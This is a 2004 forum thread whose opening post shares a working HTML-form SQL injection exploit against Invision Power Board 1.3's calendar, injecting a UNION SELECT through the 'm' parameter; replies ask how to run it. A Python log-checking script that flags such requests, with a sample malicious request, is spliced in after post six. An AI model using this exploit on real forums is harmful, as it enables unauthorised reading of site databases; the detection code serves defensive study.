Forums: Invision Power Board Free 1.3 Final - Forums

Invision Power Board Free 1.3 Final SQL Injection Exploit

#1 GaLiaRePt

Posted 04 January 2004 - 06:54 AM

--------------------IPBexploit.html--------------------


<html> 
<head><title> 
Invision Power Board Free 1.3 FINAL SQL Injection Problems 
</title></head> 
<body> 
<form action='/index.php?act=calendar' method='post' 
onsubmit="this.m.value='2 )) UNION 
'+this.request.value+'#';this.action=this.url.value+this.action;"> 
<b>IPB directory URL :</b> <input type='text' size='45' name='url' 
value='http://forum.target.com'><br><br> 
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request' 
value='SELECT * FROM ibf_calendar_events'><br><br> 
<u>Attention :</u> The request result MUST have this structure :<br><br> 
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT, 
INT,INT,STR,STR<br><br> 
<input type='hidden' name='y' value='2004'> 
<input type='hidden' name='m'> 
<input type='submit' value='Execute'> 
</form> 
<br><br><br> 
<p align="right">A patch can be found on <a 
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br> 
For more informations about this exploit : 
<a href="http://www.security-corporation.com/advisories-025.html" 
target="_blank"> 
Security-Corporation.com</a></p> 
</body> 
</html>



--------------------IPBexploit.html--------------------

Source here

#2 FiStEh

Posted 04 January 2004 - 10:12 AM

Thanky muchly, but I'm not too sure as to the function of this. <_<

#3 Guest_ara_*

Posted 04 January 2004 - 09:07 PM

Heh, isn't this the exact thing this board is running on? Hopefully patched by now ;)

#4 Guest_Iced_Eagle_*

Posted 08 February 2004 - 05:56 PM

FiStEh: copy and paste that code into, like, Notepad and save it as a .html file.

I wish I could know SQL so I could test it.

#5 nubela

Posted 08 February 2004 - 06:01 PM

lol. Hope this exploit doesn't affect this forum.
Anyway, can ya elaborate on the vulnerabilities?

And what's the function of the exploit?

#6 Guest_Iced_Eagle_*

Posted 08 February 2004 - 06:07 PM

*edit* A vulnerability has been discovered in the sources/calendar.php file that allows unauthorized users to inject SQL commands.

*edit2* I think I compiled that wrong or something... 'cause whenever I input a web address and I hit execute it goes back to C:/index.php

help?
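A detection check for the request shape discussed in this thread, as an added example that is not part of the original posts: it flags `act=calendar` requests whose `m` or `y` value is not a plain number. The (url, body) record shape, the function names and the digits-only rule are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the calendar only needs a month and a year from 'm' and 'y',
# so anything other than a short run of digits is treated as anomalous.
MONTH_RE = re.compile(r"[0-9]{1,2}")
YEAR_RE = re.compile(r"[0-9]{4}")
SQL_HINT_RE = re.compile(r"\b(union|select)\b|#|--", re.IGNORECASE)


def check_calendar_request(url, body):
    """Return findings for one logged request; an empty list means nothing flagged."""
    query = parse_qs(urlsplit(url).query)
    if "calendar" not in query.get("act", []):
        return []
    # Parameters can arrive in the POST body or in the query string.
    params = parse_qs(body, keep_blank_values=True)
    for key, values in query.items():
        params.setdefault(key, []).extend(values)
    findings = []
    for name, pattern in (("m", MONTH_RE), ("y", YEAR_RE)):
        for value in params.get(name, []):
            if pattern.fullmatch(value):
                continue
            kind = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
            findings.append((name, kind, value[:60]))
    return findings


def scan(requests):
    """Run the check over (url, body) records and keep only flagged ones."""
    return [(url, f) for url, body in requests
            for f in check_calendar_request(url, body)]


# Constructed sample records: (request URL, urlencoded POST body).
SAMPLE_REQUESTS = [
    ("/index.php?act=calendar", "y=2004&m=2"),
    ("/index.php?act=calendar",
     "y=2004&m=2+%29%29+UNION+SELECT+*+FROM+ibf_calendar_events%23"),
    ("/index.php?act=calendar&m=abc", ""),
    ("/index.php?act=Login", "m=2+UNION"),
]

if __name__ == "__main__":
    for url, finding in scan(SAMPLE_REQUESTS):
        print(url, finding)
```

Running this needs request bodies in the log source (for example a WAF or proxy audit log), since ordinary access logs do not record POST parameters.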

#7 Steffan

Posted 09 February 2004 - 12:44 AM

Iced_Eagle, on Feb 9 2004, 02:07 AM, said:

*edit2* I think I compiled that wrong or something... 'cause whenever I input a web address and I hit execute it goes back to C:/index.php

help?

You compile it?????????????? :unsure:

You mean you execute it?!!! Install a board on your CPU and let it run against it ;)

C'ya